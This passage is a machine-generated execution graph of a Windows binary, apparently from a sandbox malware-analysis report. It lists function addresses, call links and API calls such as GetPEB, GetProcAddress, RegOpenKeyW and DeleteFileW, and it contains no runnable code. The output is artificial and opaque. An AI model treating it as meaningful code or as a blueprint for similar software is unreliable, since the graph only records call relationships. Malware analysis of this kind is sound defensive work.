                                                                                                                  execution_graph 9702 40c640 9729 404bee 9702->9729 9705 40c70f 9706 404bee 6 API calls 9707 40c66b 9706->9707 9708 404bee 6 API calls 9707->9708 9713 40c708 9707->9713 9710 40c683 9708->9710 9709 402bab 2 API calls 9709->9705 9711 404bee 6 API calls 9710->9711 9717 40c701 9710->9717 9716 40c694 9711->9716 9712 402bab 2 API calls 9712->9713 9713->9709 9714 40c6f8 9715 402bab 2 API calls 9714->9715 9715->9717 9716->9714 9736 40c522 9716->9736 9717->9712 9719 40c6a9 9720 40c6ef 9719->9720 9722 405872 4 API calls 9719->9722 9721 402bab 2 API calls 9720->9721 9721->9714 9723 40c6c5 9722->9723 9724 405872 4 API calls 9723->9724 9725 40c6d5 9724->9725 9726 405872 4 API calls 9725->9726 9727 40c6e7 9726->9727 9728 402bab 2 API calls 9727->9728 9728->9720 9730 402b7c 2 API calls 9729->9730 9731 404bff 9730->9731 9732 4031e5 4 API calls 9731->9732 9735 404c3b 9731->9735 9733 404c28 9732->9733 9734 402bab 2 API calls 9733->9734 9733->9735 9734->9735 9735->9705 9735->9706 9737 402b7c 2 API calls 9736->9737 9738 40c542 9737->9738 9738->9719 9739 405941 9740 4031e5 4 API calls 9739->9740 9741 405954 9740->9741 8306 409046 8319 413b28 8306->8319 8308 40906d 8310 405b6f 6 API calls 8308->8310 8309 40904e 8309->8308 8311 403fbf 7 API calls 8309->8311 8312 40907c 8310->8312 8311->8308 8313 409092 8312->8313 8323 409408 8312->8323 8315 4090a3 8313->8315 8318 402bab 2 API calls 8313->8318 8317 402bab 2 API calls 8317->8313 8318->8315 8320 413b31 8319->8320 8321 413b38 8319->8321 8322 404056 6 API calls 8320->8322 8321->8309 8322->8321 8324 409413 8323->8324 8325 40908c 8324->8325 8337 409d36 8324->8337 8325->8317 8336 40945c 8443 40a35d 8336->8443 8338 409d43 8337->8338 8339 40a35d 4 API calls 8338->8339 8340 409d55 8339->8340 8341 4031e5 4 API calls 8340->8341 8342 409d8b 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409dd0 8343->8344 8345 405b6f 6 API calls 8344->8345 8376 409423 8344->8376 8348 409df7 8345->8348 8346 409e1c 8347 4031e5 4 API calls 8346->8347 8346->8376 8349 409e62 8347->8349 8348->8346 8350 402bab 2 API calls 8348->8350 8351 4031e5 4 API calls 8349->8351 8350->8346 8352 409e82 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409ea2 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409ec2 8355->8356 8357 4031e5 4 API calls 8356->8357 8358 409ee2 8357->8358 8359 4031e5 4 API calls 8358->8359 8360 409f02 8359->8360 8361 4031e5 4 API calls 8360->8361 8362 409f22 8361->8362 8363 4031e5 4 API calls 8362->8363 8366 409f42 8363->8366 8364 40a19b 8365 408b2c 4 API calls 8364->8365 8365->8376 8366->8364 8367 409fa3 8366->8367 8368 405b6f 6 API calls 8367->8368 8367->8376 8369 409fbd 8368->8369 8370 40a02c 8369->8370 8371 402bab 2 API calls 8369->8371 8372 4031e5 4 API calls 8370->8372 8398 40a16d 8370->8398 8374 409fd7 8371->8374 8375 40a070 8372->8375 8373 402bab 2 API calls 8373->8376 8377 405b6f 6 API calls 8374->8377 8378 4031e5 4 API calls 8375->8378 8376->8336 8399 4056bf 8376->8399 8380 409fe5 8377->8380 8379 40a090 8378->8379 8381 4031e5 4 API calls 8379->8381 8380->8370 8382 402bab 2 API calls 8380->8382 8383 40a0b0 8381->8383 8384 409fff 8382->8384 8387 4031e5 4 API calls 8383->8387 8385 405b6f 6 API calls 8384->8385 8386 40a00d 8385->8386 8386->8370 8389 40a021 8386->8389 8388 40a0d0 8387->8388 8391 4031e5 4 API calls 8388->8391 8390 402bab 2 API calls 8389->8390 8390->8376 8392 40a0f0 8391->8392 8393 4031e5 4 API calls 8392->8393 8394 40a110 8393->8394 8395 4031e5 4 API calls 8394->8395 8396 40a134 8394->8396 8395->8396 8396->8398 8453 408b2c 8396->8453 8398->8373 8398->8376 8400 402b7c 2 API calls 8399->8400 8402 4056cd 8400->8402 8401 4056d4 8404 408c4d 8401->8404 8402->8401 8403 402b7c 2 API calls 8402->8403 8403->8401 8405 413ba4 6 API calls 8404->8405 8406 408c5c 8405->8406 8407 408f02 8406->8407 8408 408f3a 8406->8408 8411 40903e 8406->8411 8410 405b6f 6 API calls 8407->8410 8409 405b6f 6 API calls 8408->8409 8425 408f51 8409->8425 8412 408f0c 8410->8412 8427 413aca 8411->8427 8412->8411 8416 408f31 8412->8416 8456 40a1b6 8412->8456 8414 405b6f 6 API calls 8414->8425 8415 402bab 2 API calls 8415->8411 8416->8415 8418 409031 8419 402bab 2 API calls 8418->8419 8419->8416 8420 409022 8421 402bab 2 API calls 8420->8421 8422 409028 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8416 8424 402bab GetProcessHeap RtlFreeHeap 8424->8425 8425->8411 8425->8414 8425->8416 8425->8418 8425->8420 8425->8424 8426 40a1b6 15 API calls 8425->8426 8490 4044ee 8425->8490 8426->8425 8428 409451 8427->8428 8429 413ad7 8427->8429 8437 405695 8428->8437 8430 405781 4 API calls 8429->8430 8431 413af0 8430->8431 8432 405781 4 API calls 8431->8432 8433 413afe 8432->8433 8434 405762 4 API calls 8433->8434 8435 413b0e 8434->8435 8435->8428 8436 405781 4 API calls 8435->8436 8436->8428 8438 4056a0 8437->8438 8439 4056b9 8437->8439 8440 402bab 2 API calls 8438->8440 8439->8336 8441 4056b3 8440->8441 8442 402bab 2 API calls 8441->8442 8442->8439 8444 40a39a 8443->8444 8448 40a368 8443->8448 8445 4031e5 4 API calls 8444->8445 8447 40a3af 8444->8447 8445->8447 8446 40a3ca 8450 40a38a 8446->8450 8452 408b2c 4 API calls 8446->8452 8447->8446 8449 408b2c 4 API calls 8447->8449 8451 4031e5 4 API calls 8448->8451 8449->8446 8450->8325 8451->8450 8452->8450 8454 4031e5 4 API calls 8453->8454 8455 408b3e 8454->8455 8455->8398 8457 40a202 8456->8457 8458 40a1c3 8456->8458 8612 405f08 8457->8612 8460 405b6f 6 API calls 8458->8460 8462 40a1d0 8460->8462 8461 40a1fc 8461->8416 8462->8461 8463 40a1f3 8462->8463 8500 40a45b 8462->8500 8468 402bab 2 API calls 8463->8468 8465 40a333 8467 402bab 2 API calls 8465->8467 8467->8461 8468->8461 8469 405b6f 6 API calls 8471 40a245 8469->8471 8470 40a25d 8472 405b6f 6 API calls 8470->8472 8471->8470 8473 413a58 14 API calls 8471->8473 8478 40a26b 8472->8478 8474 40a257 8473->8474 8477 402bab 2 API calls 8474->8477 8475 40a28b 8476 405b6f 6 API calls 8475->8476 8484 40a297 8476->8484 8477->8470 8478->8475 8479 40a284 8478->8479 8619 40955b 8478->8619 8482 402bab 2 API calls 8479->8482 8480 40a2b7 8480->8465 8483 405b6f 6 API calls 8480->8483 8489 402bab 2 API calls 8480->8489 8636 4098a7 8480->8636 8482->8475 8483->8480 8484->8480 8485 40a2b0 8484->8485 8626 40968e 8484->8626 8486 402bab 2 API calls 8485->8486 8486->8480 8489->8480 8491 402b7c 2 API calls 8490->8491 8492 404512 8491->8492 8494 404585 GetLastError 8492->8494 8495 402bab 2 API calls 8492->8495 8498 402b7c 2 API calls 8492->8498 8499 40457c 8492->8499 8891 4044a7 8492->8891 8496 404592 8494->8496 8494->8499 8495->8492 8497 402bab 2 API calls 8496->8497 8497->8499 8498->8492 8499->8425 8645 40642c 8500->8645 8502 40a469 8503 40c4ff 8502->8503 8648 4047e6 8502->8648 8503->8463 8506 4040bb 13 API calls 8507 40bf88 8506->8507 8507->8503 8508 403c90 8 API calls 8507->8508 8509 40bfaa 8508->8509 8510 402b7c 2 API calls 8509->8510 8512 40bfc1 8510->8512 8511 40c4f3 8513 403f9e 5 API calls 8511->8513 8514 40c3aa 8512->8514 8655 40a423 8512->8655 8513->8503 8514->8511 8517 4056bf 2 API calls 8514->8517 8521 40c4e3 8514->8521 8515 402bab 2 API calls 8515->8511 8519 40c3d2 8517->8519 8519->8521 8523 4040bb 13 API calls 8519->8523 8520 405f08 4 API calls 8522 40c005 8520->8522 8521->8515 8525 40c021 8522->8525 8658 40a43f 8522->8658 8524 40c3f3 8523->8524 8527 40c4d1 8524->8527 8715 405a52 8524->8715 8526 4031e5 4 API calls 8525->8526 8529 40c034 8526->8529 8532 413aca 4 API calls 8527->8532 8538 4031e5 4 API calls 8529->8538 8535 40c4dd 8532->8535 8533 40c411 8720 405a87 8533->8720 8534 402bab 2 API calls 8534->8525 8537 405695 2 API calls 8535->8537 8537->8521 8544 40c04d 8538->8544 8539 40c4b3 8540 402bab 2 API calls 8539->8540 8542 40c4cb 8540->8542 8541 405a52 4 API calls 8552 40c423 8541->8552 8543 403f9e 5 API calls 8542->8543 8543->8527 8546 4031e5 4 API calls 8544->8546 8545 405a87 4 API calls 8545->8552 8547 40c085 8546->8547 8549 4031e5 4 API calls 8547->8549 8548 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8548->8552 8550 40c09c 8549->8550 8553 4031e5 4 API calls 8550->8553 8551 402bab 2 API calls 8551->8552 8552->8539 8552->8541 8552->8545 8552->8548 8552->8551 8554 40c0b3 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c0ca 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c0e7 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c100 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c119 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c132 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c14b 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c164 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c17d 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c196 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c1af 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c1c8 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1de 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1f4 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c20d 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c226 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c23f 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c258 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c273 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c28a 8591->8592 8593 4031e5 4 API calls 8592->8593 8596 40c2d5 8593->8596 8594 40c3a2 8595 402bab 2 API calls 8594->8595 8595->8514 8596->8594 8597 4031e5 4 API calls 8596->8597 8598 40c315 8597->8598 8599 40c38b 8598->8599 8661 404866 8598->8661 8600 403c40 5 API calls 8599->8600 8602 40c397 8600->8602 8604 403c40 5 API calls 8602->8604 8604->8594 8605 40c382 8607 403c40 5 API calls 8605->8607 8607->8599 8609 406c4c 6 API calls 8610 40c355 8609->8610 8610->8605 8685 4126a7 8610->8685 8613 4031e5 4 API calls 8612->8613 8614 405f1d 8613->8614 8615 405f55 8614->8615 8616 402b7c 2 API calls 8614->8616 8615->8461 8615->8465 8615->8469 8615->8470 8617 405f36 8616->8617 8617->8615 8618 4031e5 4 API calls 8617->8618 8618->8615 8620 409673 8619->8620 8625 40956d 8619->8625 8620->8479 8621 408b45 6 API calls 8621->8625 8622 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8622->8625 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8623->8625 8624 402bab GetProcessHeap RtlFreeHeap 8624->8625 8625->8620 8625->8621 8625->8622 8625->8623 8625->8624 8627 4040bb 13 API calls 8626->8627 8634 4096a9 8627->8634 8628 40989f 8628->8485 8629 409896 8630 403f9e 5 API calls 8629->8630 8630->8628 8632 408b45 6 API calls 8632->8634 8633 402bab GetProcessHeap RtlFreeHeap 8633->8634 8634->8628 8634->8629 8634->8632 8634->8633 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8634->8635 8884 4059d8 8634->8884 8635->8634 8637 4040bb 13 API calls 8636->8637 8644 4098c1 8637->8644 8638 4099fb 8638->8480 8639 4099f3 8640 403f9e 5 API calls 8639->8640 8640->8638 8641 402bab GetProcessHeap RtlFreeHeap 8641->8644 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8643->8644 8644->8638 8644->8639 8644->8641 8644->8642 8644->8643 8646 4031e5 4 API calls 8645->8646 8647 406441 GetNativeSystemInfo 8646->8647 8647->8502 8649 4031e5 4 API calls 8648->8649 8652 40480a 8649->8652 8650 40485d 8650->8503 8650->8506 8651 4031e5 4 API calls 8651->8652 8652->8650 8652->8651 8653 40484f 8652->8653 8654 403c40 5 API calls 8653->8654 8654->8650 8656 4031e5 4 API calls 8655->8656 8657 40a435 8656->8657 8657->8520 8659 4031e5 4 API calls 8658->8659 8660 40a451 8659->8660 8660->8534 8662 4031e5 4 API calls 8661->8662 8663 40487c 8662->8663 8663->8605 8664 406c4c 8663->8664 8725 4068eb 8664->8725 8666 406e02 8666->8609 8667 406cab 8737 40469b 8667->8737 8668 406c6c 8668->8666 8668->8667 8734 406894 8668->8734 8675 406df1 8676 40469b 4 API calls 8675->8676 8676->8666 8677 406cef 8677->8675 8678 4031e5 4 API calls 8677->8678 8679 406d26 8678->8679 8679->8675 8680 40771e 6 API calls 8679->8680 8684 406d57 8680->8684 8681 406da2 8682 4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8533 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap RtlFreeHeap 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 14 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 4031e5 4 API calls 9106 40887e 9104->9106 9105 40893e 9173 404a39 9105->9173 9106->9103 9106->9104 9106->9105 9108 402b7c 2 API calls 9106->9108 9108->9106 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9163 405872 4 API calls 9161->9163 9164 405872 4 API calls 9162->9164 9165 40813e 9163->9165 9166 4080fb 9164->9166 9168 405872 4 API calls 9165->9168 9167 405872 4 API calls 9166->9167 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9106 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 13 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9869 410604 9862->9869 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9868 4105fb 9866->9868 9867 402bab 2 API calls 9867->9869 9868->9867 9869->9863 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9866 9874->9868 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 14 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 21 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 21 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 21 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 21 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 20 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 20 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 14 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 15 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 15 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 15 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 15 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 14 API calls 9445->9447 9448 402bab 